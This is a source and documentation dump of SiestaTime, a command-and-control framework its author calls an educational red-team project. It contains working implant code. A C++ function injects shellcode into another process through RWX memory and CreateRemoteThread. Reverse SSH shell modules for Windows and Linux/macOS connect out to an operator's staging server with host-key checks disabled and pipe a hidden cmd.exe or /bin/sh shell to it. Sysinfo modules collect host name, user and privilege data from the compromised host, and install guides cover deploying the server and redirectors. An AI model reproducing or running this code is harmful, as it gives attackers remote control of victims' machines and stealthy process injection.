error)//char* result,char* error) 32 | { 33 | 34 | HANDLE processHandle; 35 | HANDLE remoteThread; 36 | PVOID remoteBuffer; 37 | int writeRes; 38 | 39 | processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(pid)); 40 | if (processHandle == NULL){ 41 | DWORD dwError = GetLastError(); 42 | sprintf(error, "OpenProcess Error: %ld\n", dwError); 43 | return 0; 44 | } 45 | 46 | //processHandle = processInfo.hProcess; 47 | remoteBuffer = VirtualAllocEx(processHandle, NULL, size_shellcode, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE); 48 | if (remoteBuffer == NULL) { 49 | DWORD dwError = GetLastError(); 50 | sprintf(error, "VirtualAllocEx Error: %ld\n", dwError); 51 | return 0; 52 | } 53 | 54 | writeRes = WriteProcessMemory(processHandle, remoteBuffer, shellcode, size_shellcode, NULL); 55 | if (writeRes == 0) { 56 | DWORD dwError = GetLastError(); 57 | sprintf(error, "WriteProcessMemory Error: %ld\n", dwError); 58 | return 0; 59 | } 60 | 61 | remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL); 62 | if (remoteThread == NULL) { 63 | DWORD dwError = GetLastError(); 64 | sprintf(error, "CreateRemoteThread Error: %ld\n", dwError); 65 | return 0; 66 | } 67 | 68 | /* 69 | if (CloseHandle(processHandle)) { 70 | DWORD dwError = GetLastError(); 71 | sprintf(error, "VirtualAllocEx Error: %ld", dwError); 72 | printf("CloseHandle Error: %ld\n", dwError); 73 | } 74 | */ 75 | 76 | return 1; 77 | } -------------------------------------------------------------------------------- /docs/install/dependencies.rst: -------------------------------------------------------------------------------- 1 | Dependencies 2 | =========================== 3 | 4 | 5 | Some of the modules and capabilities of Bichito are written using native libraries of target OS Devices. For the proper functioning of them, target OS dependencies need to be acquired. 6 | 7 | Why Dependencies? 8 | ------------------- 9 | 10 | SiestaTime is designed to generate implants for three platforms: **Linux,Windows and Darwin** 11 | It will use Go to compile the implants for target OS and architecture, but some of the implants functionalities require more specific dependencies. 12 | To do the "system level delicate stuff" SiestaTime will use ``cgo`` and ``C wrappers`` to call C++, Objective-C, which will require certain target OS dependencies (that will be statically linked in the compilation process of the implants). 13 | 14 | * Windows: ``CGO + MinGW`` 15 | 16 | * Darwin: ``CGO + OSXCross`` 17 | 18 | 19 | Get Dependencies from Windows 10 20 | -------------------------------------------- 21 | 22 | To properly install Hive a set of dependencies extracted from Windows need to be in place first. This will be necessary to be able to compile some implant modules for windows. The result of this step should be a zipped folder with the following structure: 23 | 24 | :: 25 | 26 | includes/ 27 | taskschd.h 28 | libs/ 29 | x86/ 30 | comsupp.lib 31 | x64/ 32 | comsupp.lib 33 | 34 | This zip needs to be placed: 35 | 36 | .. prompt:: bash $ 37 | 38 | ./SiestaTime/installConfig/windependencies.zip 39 | 40 | 41 | The command you can run for generating the resulting zip: 42 | 43 | .. prompt:: bash $ 44 | 45 | zip -r windependencies.zip * 46 | 47 | **Search for target dependencies** 48 | 49 | * Perform a clean Windows 10 Installation (EG. virtual machine) 50 | 51 | * Install microsoft visual studio community() with ``C++ Console apps Development`` 52 | 53 | .. figure:: ../_static/images/install/winsearch.png 54 | :align: right 55 | :figwidth: 300px 56 | :target: ../_static/images/install/winsearch.png 57 | 58 | .. figure:: ../_static/images/install/vsc.png 59 | :align: right 60 | :figwidth: 300px 61 | :target: ../_static/images/install/vsc.png 62 | 63 | 64 | 65 | * Copy target files keeping previous folder structure. You can just find the files on windows after Visual Studio with C++ support is installed (listed at ``./SiestaTime/installConfig/implant_dependencies.txt`` ) 66 | 67 | .. note:: 68 | A script will be provided in the future when dependency tree grow bigger 69 | 70 | Get Dependencies from Darwin (Mac OSX) 71 | -------------------------------------------------- 72 | 73 | 74 | A. Install XCode on MacOSX 10.13 75 | B. ``git clone https://github.com/tpoechtrager/osxcross`` 76 | C. Run osxcross extract script 77 | 78 | .. prompt:: bash $ 79 | 80 | ./tools/gen_sdk_package.sh 81 | 82 | 83 | 84 | D. Copy output file to ``SiestaTime/installConfig/MacOSX10.13.sdk.tar.xz`` 85 | 86 | .. note:: Since i386 has been dropped <= most ideally 10.13 of your Darwin OS should be used -------------------------------------------------------------------------------- /src/redirector/redBiComs.go: -------------------------------------------------------------------------------- 1 | //{{{{{{{ Redirector Bichito Coms }}}}}}} 2 | 3 | //By Rebujacker - Alvaro Folgado Rueda as an open source educative project 4 | package main 5 | 6 | import ( 7 | "fmt" 8 | ) 9 | 10 | /* 11 | This part of Redirector handles the queues and Slices for Jobs that come from Implants, or need to be sent to Implants. 12 | These functions will be consumed by the target Network module. 13 | Each time a bichito connect to a redirector, this will trigger a connection routine against Hive: ./src/redirector/redHivComs.go (connectHive) 14 | */ 15 | 16 | /* 17 | Description: Retrieve target bichitos Jobs from on memory slice (those that come from Hive and are ready to go) 18 | Flow: 19 | A. Start a new connection to retrieve/send data to Hive if not connection is already ongoing 20 | B. Make a copy of the "on-memory" slice for Jobs that come from Hive and need to be sent to their respective Implant. 21 | This is done to avoid race conditions, and mutual slice blocking 22 | C. Loop over the copied slice, and retrieve the Jobs of the BID selected by the function 23 | D. Start a routine to remove from the slice the copied Jobs, later on 24 | E. Return the data so the network module can deliver to the Bichito the jobs 25 | */ 26 | func getBiJobs(bid string) []*Job{ 27 | var result []*Job 28 | 29 | if lock.Lock == 0 {go connectHive()} 30 | 31 | copyJobs := jobsToBichito.Jobs 32 | removePos := make(map[int]int) 33 | 34 | for i,_ := range copyJobs { 35 | if copyJobs[i].Chid == bid{ 36 | result = append(result,copyJobs[i]) 37 | removePos[i] = 1 38 | } 39 | } 40 | 41 | go removeBidJobs(removePos) 42 | return result 43 | } 44 | 45 | /* 46 | This function will be started as a routine to remove the processed Jobs in the previous function. 47 | It will block the on-memory slice of Jobs to be sent to Implants 48 | */ 49 | func removeBidJobs(removePos map[int]int) { 50 | 51 | jobsToBichito.mux.Lock() 52 | 53 | j := 0 54 | for i,_ := range jobsToBichito.Jobs { 55 | if removePos[i] == 1{ 56 | 57 | }else{ 58 | jobsToBichito.Jobs[j] = jobsToBichito.Jobs[i] 59 | j++ 60 | } 61 | } 62 | jobsToBichito.Jobs = jobsToBichito.Jobs[:j] 63 | 64 | jobsToBichito.mux.Unlock() 65 | return 66 | } 67 | 68 | 69 | /* 70 | Description: Send a group of Jobs to the queue to be sent back to Hive 71 | Flow: 72 | A. Process the Jobs and adapt their PID to RID (for tracking purposes later on within Hive) 73 | B. Lock the on memory slice of Jobs to be sent to Hive and append them 74 | B1.To avoid overhead, if the on memory slice is larger than 10, drop the jobs 75 | */ 76 | func processJobs(jobs []*Job){ 77 | 78 | for _,job := range jobs{ 79 | job.Pid = rid 80 | } 81 | 82 | //Lock shared Slice 83 | jobsToHive.mux.Lock() 84 | defer jobsToHive.mux.Unlock() 85 | 86 | //Skip logs when there is a job/log overhead 87 | if len(jobsToHive.Jobs) > 10 { 88 | fmt.Println("Exiting") 89 | return 90 | } 91 | 92 | jobsToHive.Jobs = append(jobsToHive.Jobs,jobs...) 93 | 94 | } 95 | 96 | -------------------------------------------------------------------------------- /docs/misc/concepts.rst: -------------------------------------------------------------------------------- 1 | Theory: Why Siesta Time ? 2 | =========================== 3 | 4 | Concepts 5 | -------------------------------------------------- 6 | 7 | Hive 8 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 9 | Is the main “Operation Server”. Hive will receive every command/job from authenticated clients and process or redirect them to a target foothold. 10 | The main DB of siesta time will be in this server, with all information/configurations from the red team operators’ actions. 11 | 12 | Operator 13 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 14 | Is the equivalent of the user in Siesta Time. The creator of hive or “Admin” (first user) will be the only one able to add new Operators. 15 | Operators added will be able to compile their own client and connect to Hive. 16 | 17 | VPS/VPC 18 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 19 | “Virtual Private Service/Cloud” are sets of credentials saved in Hive that can be used to deploy redirectors that backbone implants’ connection and Post./Staging Servers to interact with them later on. 20 | 21 | Domain 22 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 23 | Hive will be able to store a set of credentials to manipulate a target domain at will. Used to map its resolution to the generated Server’s infrastructure selected VPCs. Once an element is requested to be created (implant,post. server...) 24 | 25 | SaaS 26 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 27 | “Software as a Service” are sets of credentials from an internet service that let implants to egress using string data 28 | 29 | Implant 30 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 31 | Implants are composed by a number of redirectors and the compiled executables for different platforms (linux,darwin and windows). 32 | The implants will have an array of redirectors to connect to, that will be in the shape of a target IP,domain or SaaS account. 33 | These redirectors will be deployed in the creation of the implant 34 | 35 | Redirector 36 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 37 | Host with a server software running as a service. Its purpose is to redirect jobs from footholds (bichitos) to the Hive, and vice versa.They are automatically deployed on implant creation. 38 | In offline mode, the redirector executable can be downloaded to be installed in any desired host 39 | 40 | Bichito 41 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 42 | The main implant of Siesta Time. They are generated in the shape of an executable for a target platform. Once executed, they will appear as an online process within the created implant and attached to a redirector. 43 | On the implant creation it is possible to choose the capabilities of 44 | the Bichitos. How will egress through the network, his time to day, persistence… these are the modules 45 | 46 | Staging/Post 47 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 48 | Servers whose objective is performing delivery, staging and post-exploitation tasks. 49 | Operators can directly connect/interact with them. 50 | 51 | Report 52 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 53 | These elements are a plain text file that holds every Job processed by Hive, and every command typed on Staging/Posts servers 54 | 55 | Client 56 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 57 | GUI on electron and go application running in operators devices. 58 | Clients will authenticate against hive and send jobs to it. They can also interact with Post. Servers thanks to a Hive tunnelization. 59 | 60 | 61 | -------------------------------------------------------------------------------- /docs/install/hive.rst: -------------------------------------------------------------------------------- 1 | Hive 2 | =========================== 3 | 4 | 5 | Hive is the main Operations Server of Siesta Time. Is the first element that needs to be deployed. 6 | The user has the option to do it ``Offline``, or using terraform to deploy Hive with target Virtual Private Cloud resources. 7 | Configurations of target VPC to use will be saved in a txt file by the syntax of: ``./SiestaTime/installconfig/config.txt`` 8 | There is the option to deploy without using a VPC, or ``Offline``, this will install Hive in the current host. 9 | 10 | 11 | What this does? What is Hive? 12 | ------------------------------ 13 | 14 | Hive is the main “Operation Server”. Hive will receive every command/job from authenticated clients and process or redirect them to a target foothold. 15 | The main DB of siesta time will be in this server, with all information/configurations from the red team operators’ actions. 16 | 17 | * Install in the installer's device host system dependencies (gcc,apache utils,...) 18 | * Parse config.txt file, use the parameters for creating a hive.tf (terraform plan) 19 | * Download Go and the required dependencies to compile Hive. 20 | * Create Hive sqlite DB 21 | * Download Terraform and apply plan 22 | 23 | In the same way, the hive.tf plan will (and this will be performed in the same host if Offline): 24 | 25 | * Install Hive OS/Distro. dependencies 26 | * Download go and their dependencies, to be able to compile Implants 27 | * Download Terraform and terraform plugins 28 | * Create ``/usr/local/STHive`` folder structure 29 | * Upload OS dependencies, keys, sqlite DB, compiled Hive binary ... 30 | * Configure Hive as a service 31 | 32 | 33 | 34 | 35 | 36 | Online - AWS 37 | ---------------- 38 | 39 | **Steps to Prepare AWS Servers** 40 | 41 | * Find EC2 Information 42 | * Prepare AWS key and credentials for target VPC 43 | * AccessKey/SecretKey 44 | * EC2 → “My Security Credentials” → “Access Keys” 45 | * `ami`_ 46 | * `region`_ 47 | * Create key pair on target region and Download “.pem” key 48 | 49 | 50 | * Complete ``SiestaTime/installConfig/configAWS.txt`` 51 | 52 | :: 53 | 54 | USERNAME : Admin Username 55 | PASSWORD : Admin password 56 | port : HTTPS Hive port listener 57 | accesskey: AWS accesskey 58 | secretkey: AWS secretkey 59 | Region: AWS region 60 | Keyname: AWS keyname (without .pem) 61 | ami: aws ami 62 | itype: AWS ec2 itype 63 | 64 | * Copy AWS key to ``SiestaTime/installConfig/.pem`` 65 | 66 | * Run 67 | 68 | .. prompt:: bash $ 69 | 70 | ./hive.sh installaws 71 | 72 | Offline 73 | ----------- 74 | Offline option let operators to install hive in a target host without the use of terraform or any kind of VPC credentials. 75 | 76 | ``./hive.sh installOffline `` 77 | 78 | .. prompt:: bash $ 79 | 80 | ./hive.sh installOffline 0.0.0.0 6232 /usr/local/ admin admin 81 | 82 | 83 | 84 | .. note:: 85 | Every installing option comes with a "No Darwin" version of it. This will let hive to work without the need of Darwin dependencies (but loosing MacOSX implant abilities) 86 | 87 | .. prompt:: bash $ 88 | 89 | ./hive.sh installawsNoDarwin 90 | ./hive.sh installOfflineNoDarwin 91 | [...] 92 | 93 | Uninstall 94 | ----------- 95 | 96 | .. prompt:: bash $ 97 | 98 | ./hive.sh remove 99 | 100 | .. warning:: When installed Offline remove will not erase created/configured host data and packages 101 | 102 | 103 | .. _ami: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/finding-an-ami.html 104 | .. _region: https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.RegionsAndAvailabilityZones.html -------------------------------------------------------------------------------- /src/hive/hivMisc.go: -------------------------------------------------------------------------------- 1 | //{{{{{{{ Hive Miscelanious Functions and external sources }}}}}}} 2 | 3 | //// Extra functions to help Hive with different tasks 4 | // A. randomString (from: https://www.calhoun.io/creating-random-strings-in-go/) 5 | 6 | //By Rebujacker - Alvaro Folgado Rueda as an open source educative project 7 | package main 8 | 9 | import ( 10 | "time" 11 | "math/rand" 12 | "strconv" 13 | "regexp" 14 | ) 15 | 16 | // Some Input Sanitation Functions (to Improve...) 17 | 18 | func gmailInputWhite(input string) bool{ 19 | 20 | if (len(input) > 5000){ 21 | return false 22 | } 23 | return true 24 | 25 | } 26 | 27 | func accessKeysInputWhite(input string) bool{ 28 | var white = regexp.MustCompile(`^[a-zA-Z0-9\-\.\+_/=]{1,200}$`).MatchString 29 | return white(input) 30 | 31 | } 32 | 33 | func rsaKeysInputWhite(input string) bool{ 34 | 35 | //var white = regexp.MustCompile(`^[a-zA-Z0-9\-\.\+_/=\s]$`).MatchString 36 | if (len(input) > 5000){ 37 | return false 38 | } 39 | return true 40 | } 41 | 42 | 43 | func namesInputWhite(input string) bool{ 44 | var white = regexp.MustCompile(`^[a-zA-Z0-9]{1,20}$`).MatchString 45 | return white(input) 46 | } 47 | 48 | func idsInputWhite(input string) bool{ 49 | var white = regexp.MustCompile(`^[a-zA-Z0-9\-]{1,20}$`).MatchString 50 | return white(input) 51 | } 52 | 53 | func filesInputWhite(input string) bool{ 54 | var white = regexp.MustCompile(`^[\w.-]{1,20}$`).MatchString 55 | return white(input) 56 | } 57 | 58 | func numbersInputWhite(input string) bool{ 59 | var white = regexp.MustCompile(`^[0-9]{1,200}$`).MatchString 60 | return white(input) 61 | } 62 | 63 | func domainsInputWhite(input string) bool{ 64 | var white = regexp.MustCompile(`^[a-zA-Z0-9][a-zA-Z0-9-]{1,61}[a-zA-Z0-9]\.[a-zA-Z]{2,}$`).MatchString 65 | 66 | //For Ipv4 Address 67 | var white2 = regexp.MustCompile(`^(?:(?:^|\.)(?:2(?:5[0-5]|[0-4]\d)|1?\d?\d)){4}$`).MatchString 68 | var result = (white(input) || white2(input)) 69 | return result 70 | } 71 | 72 | func tcpPortInputWhite(input string) bool{ 73 | var white = regexp.MustCompile(`^()([1-9]|[1-5]?[0-9]{2,4}|6[1-4][0-9]{3}|65[1-4][0-9]{2}|655[1-2][0-9]|6553[1-5])$`).MatchString 74 | return white(input) 75 | 76 | } 77 | 78 | 79 | 80 | func randomString(length int) string{ 81 | 82 | charset := "abcdefghijklmnopqrstuvwxyz" + "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" 83 | var seededRand *rand.Rand = rand.New(rand.NewSource(time.Now().UnixNano())) 84 | b := make([]byte, length) 85 | for i := range b { 86 | b[i] = charset[seededRand.Intn(len(charset))] 87 | } 88 | 89 | return string(b) 90 | } 91 | 92 | func randomTCP(usedPorts []string) string{ 93 | 94 | var seededRand *rand.Rand = rand.New(rand.NewSource(time.Now().UnixNano())) 95 | var notUsedPorts []string 96 | 97 | ports := makeRange(0,65535) 98 | 99 | j := 0 100 | for i,_ := range ports { 101 | if !(stringInSlice(ports[i],usedPorts)){ 102 | ports[j] = ports[i] 103 | j++ 104 | } 105 | } 106 | 107 | notUsedPorts = ports[:j] 108 | 109 | return notUsedPorts[seededRand.Intn(len(notUsedPorts))] 110 | } 111 | 112 | func stringInSlice(a string, list []string) bool { 113 | for _, b := range list { 114 | if b == a { 115 | return true 116 | } 117 | } 118 | return false 119 | } 120 | 121 | 122 | func makeRange(min, max int) []string { 123 | 124 | a := make([]int, max-min+1) 125 | valuesText := []string{} 126 | for i := range a { 127 | a[i] = min + i 128 | } 129 | 130 | for i := range a { 131 | number := a[i] 132 | text := strconv.Itoa(number) 133 | valuesText = append(valuesText, text) 134 | } 135 | return valuesText 136 | } -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/inject_rev_sshShell_windows.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | 4 | package biterpreter 5 | 6 | import ( 7 | 8 | "bufio" 9 | "bytes" 10 | "net" 11 | "os/exec" 12 | "syscall" 13 | 14 | "golang.org/x/crypto/ssh" 15 | 16 | //Fixes 17 | "time" 18 | "encoding/json" 19 | //"fmt" 20 | ) 21 | /* 22 | This JSON Object definition is needed in some Implants Modules to decode parameters 23 | Hive will have the same definitions in: ./src/hive/hiveJobs.go 24 | */ 25 | type InjectRevSshShellBichito struct { 26 | Domain string `json:"domain"` 27 | Sshkey string `json:"sshkey"` 28 | Port string `json:"port"` 29 | User string `json:"user"` 30 | } 31 | 32 | /* 33 | Description: Inject Reverse Shell --> Windows 34 | Flow: 35 | A.Use golang ssh native library to spawn a ssh client that connects to a target staging 36 | A1.Use provided credentials (username and pem key), for the ssh connection 37 | B.This connection will create a listener in 2222 localport of target staging 38 | C.Spawn a cmd process within the foothold, and pipe stdout/stdin through this last opened socket 39 | */ 40 | func RevSshShell(jsonparams string) (bool,string){ 41 | 42 | var revsshshellparams *InjectRevSshShellBichito 43 | errDaws := json.Unmarshal([]byte(jsonparams),&revsshshellparams) 44 | if errDaws != nil { 45 | return true,"Parameters JSON Decoding error:"+errDaws.Error() 46 | } 47 | 48 | auth, err := loadPrivateKey(revsshshellparams.Sshkey) 49 | if err != nil { 50 | return true,"Load Key String error" 51 | } 52 | 53 | config := &ssh.ClientConfig{ 54 | User: revsshshellparams.User, 55 | Auth: nil, 56 | HostKeyCallback: func(hostname string, remote net.Addr, key ssh.PublicKey) error { 57 | return nil 58 | }, 59 | Timeout:time.Second * 1, 60 | } 61 | 62 | config.Auth = append(config.Auth, auth) 63 | 64 | // Dial the SSH connection 65 | sshConn, err := ssh.Dial("tcp", revsshshellparams.Domain+":"+revsshshellparams.Port, config) 66 | if err != nil { 67 | return true,"Error: error dialing remote host:"+err.Error() 68 | } 69 | 70 | 71 | // Listen on remote 72 | l, err := sshConn.Listen("tcp", "127.0.0.1:2222") 73 | if err != nil { 74 | return true,"Error: error listening on remote host:"+err.Error() 75 | } 76 | 77 | go listenSSH(sshConn,l) 78 | 79 | return false,"Success: Rev SSH Shell Connected to Staging" 80 | } 81 | 82 | 83 | func listenSSH(sshconn *ssh.Client,l net.Listener){ 84 | 85 | defer sshconn.Close() 86 | 87 | // Start accepting shell connections 88 | for { 89 | conn, err := l.Accept() 90 | if err != nil { 91 | continue 92 | } 93 | 94 | handleConnection(conn) 95 | return 96 | } 97 | } 98 | 99 | func handleConnection(c net.Conn) { 100 | defer c.Close() 101 | 102 | r := bufio.NewReader(c) 103 | for{ 104 | order, err := r.ReadString('\n') 105 | if nil != err { 106 | fmt.Println("Read Error: "+err.Error()) 107 | return 108 | } 109 | 110 | var outbuf,errbuf bytes.Buffer 111 | 112 | // Start the command 113 | cmd := exec.Command("C:\\Windows\\System32\\cmd.exe","/c",order+"\n") 114 | cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} 115 | 116 | cmd.Stdout = &outbuf 117 | cmd.Stderr = &errbuf 118 | 119 | 120 | err = cmd.Run() 121 | if err != nil { 122 | //Continue since typing wrong commands will break the pipe 123 | //return 124 | continue 125 | } 126 | 127 | c.Write([]byte(outbuf.String())) 128 | c.Write([]byte(errbuf.String())) 129 | } 130 | 131 | } 132 | 133 | /* 134 | func loadPrivateKey(keyString string) (ssh.AuthMethod, error) { 135 | 136 | 137 | signer, signerErr := ssh.ParsePrivateKey([]byte(keyString)) 138 | if signerErr != nil { 139 | return nil, signerErr 140 | } 141 | return ssh.PublicKeys(signer), nil 142 | } 143 | */ -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/inject_rev_sshShell_linuxdarwin.go: -------------------------------------------------------------------------------- 1 | // +build linux darwin 2 | 3 | 4 | package biterpreter 5 | 6 | import ( 7 | 8 | "io" 9 | //"log" 10 | "net" 11 | "os/exec" 12 | 13 | "github.com/kr/pty" 14 | "golang.org/x/crypto/ssh" 15 | 16 | //Fixes 17 | "time" 18 | "encoding/json" 19 | "fmt" 20 | ) 21 | 22 | /* 23 | This JSON Object definition is needed in some Implants Modules to decode parameters 24 | Hive will have the same definitions in: ./src/hive/hiveJobs.go 25 | */ 26 | type InjectRevSshShellBichito struct { 27 | Domain string `json:"domain"` 28 | Sshkey string `json:"sshkey"` 29 | Port string `json:"port"` 30 | User string `json:"user"` 31 | } 32 | 33 | /* 34 | Description: Inject Reverse Shell --> Linux,Darwin 35 | Flow: 36 | A.Use golang ssh native library to spawn a ssh client that connects to a target staging 37 | A1.Use provided credentials (username and pem key), for the ssh connection 38 | B.This connection will create a listener in 2222 localport of target staging 39 | C.Spawn a sh process within the foothold, and pipe stdout/stdin(tty) through this last opened socket 40 | */ 41 | func RevSshShell(jsonparams string) (bool,string){ 42 | 43 | //Debug 44 | fmt.Println(jsonparams) 45 | 46 | var revsshshellparams *InjectRevSshShellBichito 47 | errDaws := json.Unmarshal([]byte(jsonparams),&revsshshellparams) 48 | if errDaws != nil { 49 | return true,"Parameters JSON Decoding error:"+errDaws.Error() 50 | } 51 | 52 | auth, err := loadPrivateKey(revsshshellparams.Sshkey) 53 | if err != nil { 54 | return true,"Load Key String error" 55 | } 56 | 57 | config := &ssh.ClientConfig{ 58 | User: revsshshellparams.User, 59 | Auth: nil, 60 | HostKeyCallback: func(hostname string, remote net.Addr, key ssh.PublicKey) error { 61 | return nil 62 | }, 63 | Timeout:time.Second * 1, 64 | } 65 | 66 | config.Auth = append(config.Auth, auth) 67 | 68 | // Dial the SSH connection 69 | sshConn, err := ssh.Dial("tcp", revsshshellparams.Domain+":"+revsshshellparams.Port, config) 70 | if err != nil { 71 | return true,"Error: error dialing remote host:"+err.Error() 72 | } 73 | 74 | 75 | // Listen on remote 76 | l, err := sshConn.Listen("tcp", "127.0.0.1:2222") 77 | if err != nil { 78 | return true,"Error: error listening on remote host:"+err.Error() 79 | } 80 | 81 | go listenSSH(sshConn,l) 82 | 83 | return false,"Success: Rev SSH Shell Connected to Staging" 84 | } 85 | 86 | 87 | func listenSSH(sshconn *ssh.Client,l net.Listener){ 88 | 89 | defer sshconn.Close() 90 | 91 | // Start accepting shell connections 92 | for { 93 | conn, err := l.Accept() 94 | if err != nil { 95 | continue 96 | } 97 | 98 | handleConnection(conn) 99 | 100 | return 101 | } 102 | } 103 | 104 | func handleConnection(c net.Conn) { 105 | defer c.Close() 106 | 107 | // Start the command 108 | cmd := exec.Command("/bin/sh") 109 | 110 | // Start the command with a pty. 111 | ptmx, err := pty.Start(cmd) 112 | if err != nil { 113 | return 114 | } 115 | // Make sure to close the pty at the end. 116 | defer func() { 117 | _ = ptmx.Close() 118 | cmd.Process.Kill(); 119 | cmd.Process.Wait(); 120 | 121 | }() 122 | 123 | 124 | errs := make(chan error, 3) 125 | 126 | go func() { 127 | _, err = io.Copy(ptmx, c) 128 | errs <- err 129 | }() 130 | 131 | go func() { 132 | _, err = io.Copy(c, ptmx) 133 | errs <- err 134 | }() 135 | 136 | <-errs 137 | 138 | return 139 | } 140 | 141 | /* 142 | func loadPrivateKey(keyString string) (ssh.AuthMethod, error) { 143 | 144 | 145 | signer, signerErr := ssh.ParsePrivateKey([]byte(keyString)) 146 | if signerErr != nil { 147 | return nil, signerErr 148 | } 149 | return ssh.PublicKeys(signer), nil 150 | } 151 | */ -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/sysinfo_no_native_darwin.go: -------------------------------------------------------------------------------- 1 | // +build darwin-sysnonative 2 | 3 | 4 | package biterpreter 5 | 6 | import ( 7 | 8 | "os/exec" // requirement to execute commands against target system 9 | "bytes" 10 | "encoding/json" 11 | "runtime" 12 | ) 13 | 14 | type SysInfo struct { 15 | Pid string `json:"pid"` 16 | Arch string `json:"arch"` 17 | Os string `json:"os"` 18 | OsV string `json:"osv"` 19 | Hostname string `json:"hostname"` 20 | Mac string `json:"mac"` 21 | User string `json:"user"` 22 | Privileges string `json:"privileges"` 23 | 24 | } 25 | 26 | 27 | /* 28 | Description: Sysinfo No Native --> Darwin. Retrieve Operating System key information from the foothold. 29 | Flow: 30 | A.Use OS commands to retrieve foothold key info 31 | */ 32 | func Sysinfo() (bool,string){ 33 | 34 | var( 35 | pid,os,osv,arch,hostname,mac,user,privileges string 36 | outbuf, errbuf bytes.Buffer 37 | ) 38 | 39 | //Pid 40 | cmd_path := "/bin/sh" 41 | cmd := exec.Command(cmd_path, "-c","echo $$") 42 | cmd.Stdout = &outbuf 43 | cmd.Stderr = &errbuf 44 | cmd.Run() 45 | cmd.Wait() 46 | pid = outbuf.String() 47 | stderr := errbuf.String() 48 | if stderr != "" { 49 | return true,"Error Getting OS:"+stderr 50 | } 51 | 52 | //OS 53 | cmd = exec.Command(cmd_path, "-c","uname") 54 | cmd.Stdout = &outbuf 55 | cmd.Stderr = &errbuf 56 | cmd.Run() 57 | cmd.Wait() 58 | os = "Compiled for darwin: " + outbuf.String() 59 | stderr = errbuf.String() 60 | if stderr != "" { 61 | return true,"Error Getting OS:"+stderr 62 | } 63 | 64 | outbuf.Reset() 65 | errbuf.Reset() 66 | 67 | //OS Distro 68 | cmd = exec.Command(cmd_path, "-c","sw_vers") 69 | cmd.Stdout = &outbuf 70 | cmd.Stderr = &errbuf 71 | cmd.Run() 72 | cmd.Wait() 73 | osv = outbuf.String() 74 | stderr = errbuf.String() 75 | if stderr != "" { 76 | return true,"Error Getting OS Version:"+stderr 77 | } 78 | 79 | outbuf.Reset() 80 | errbuf.Reset() 81 | 82 | //Arch 83 | cmd = exec.Command(cmd_path, "-c","uname -m") 84 | cmd.Stdout = &outbuf 85 | cmd.Stderr = &errbuf 86 | cmd.Run() 87 | cmd.Wait() 88 | arch = "Compiled for "+runtime.GOARCH+": "+ outbuf.String() 89 | stderr = errbuf.String() 90 | if stderr != "" { 91 | return true,"Error Getting Arch:"+stderr 92 | } 93 | 94 | outbuf.Reset() 95 | errbuf.Reset() 96 | 97 | //Hostname 98 | cmd = exec.Command(cmd_path, "-c","hostname") 99 | cmd.Stdout = &outbuf 100 | cmd.Stderr = &errbuf 101 | cmd.Run() 102 | cmd.Wait() 103 | hostname = outbuf.String() 104 | stderr = errbuf.String() 105 | if stderr != "" { 106 | return true,"Error Getting Hostname:"+stderr 107 | } 108 | 109 | outbuf.Reset() 110 | errbuf.Reset() 111 | 112 | //mac 113 | cmd = exec.Command(cmd_path, "-c","ifconfig | grep ether | cut -d \" \" -f 2 | head -n 1") 114 | cmd.Stdout = &outbuf 115 | cmd.Stderr = &errbuf 116 | cmd.Run() 117 | cmd.Wait() 118 | mac = outbuf.String() 119 | stderr = errbuf.String() 120 | 121 | if stderr != "" { 122 | return true,"Error Getting MAC:"+stderr 123 | } 124 | 125 | outbuf.Reset() 126 | errbuf.Reset() 127 | 128 | //user 129 | cmd = exec.Command(cmd_path, "-c","whoami") 130 | cmd.Stdout = &outbuf 131 | cmd.Stderr = &errbuf 132 | cmd.Run() 133 | cmd.Wait() 134 | user = outbuf.String() 135 | stderr = errbuf.String() 136 | if stderr != "" { 137 | return true,"Error Getting User:"+stderr 138 | } 139 | 140 | outbuf.Reset() 141 | errbuf.Reset() 142 | 143 | //privileges 144 | if user == "root" { 145 | privileges = "root" 146 | }else{ 147 | privileges = "No root" 148 | } 149 | 150 | 151 | sysinfo := SysInfo{pid,os,osv,arch,hostname,mac,user,privileges} 152 | bufRP := new(bytes.Buffer) 153 | json.NewEncoder(bufRP).Encode(sysinfo) 154 | resultRP := bufRP.String() 155 | return false,resultRP 156 | } -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/sysinfo_no_native_linux.go: -------------------------------------------------------------------------------- 1 | // +build linux-sysnonative 2 | 3 | 4 | package biterpreter 5 | 6 | import ( 7 | 8 | "os/exec" // requirement to execute commands against target system 9 | "bytes" 10 | "encoding/json" 11 | "runtime" 12 | ) 13 | 14 | type SysInfo struct { 15 | Pid string `json:"pid"` 16 | Arch string `json:"arch"` 17 | Os string `json:"os"` 18 | OsV string `json:"osv"` 19 | Hostname string `json:"hostname"` 20 | Mac string `json:"mac"` 21 | User string `json:"user"` 22 | Privileges string `json:"privileges"` 23 | 24 | } 25 | 26 | /* 27 | Description: Sysinfo No Native --> Linux. Retrieve Operating System key information from the foothold. 28 | Flow: 29 | A.Use OS commands to retrieve foothold key info 30 | */ 31 | func Sysinfo() (bool,string){ 32 | 33 | var( 34 | pid,os,osv,arch,hostname,mac,user,privileges string 35 | outbuf, errbuf bytes.Buffer 36 | ) 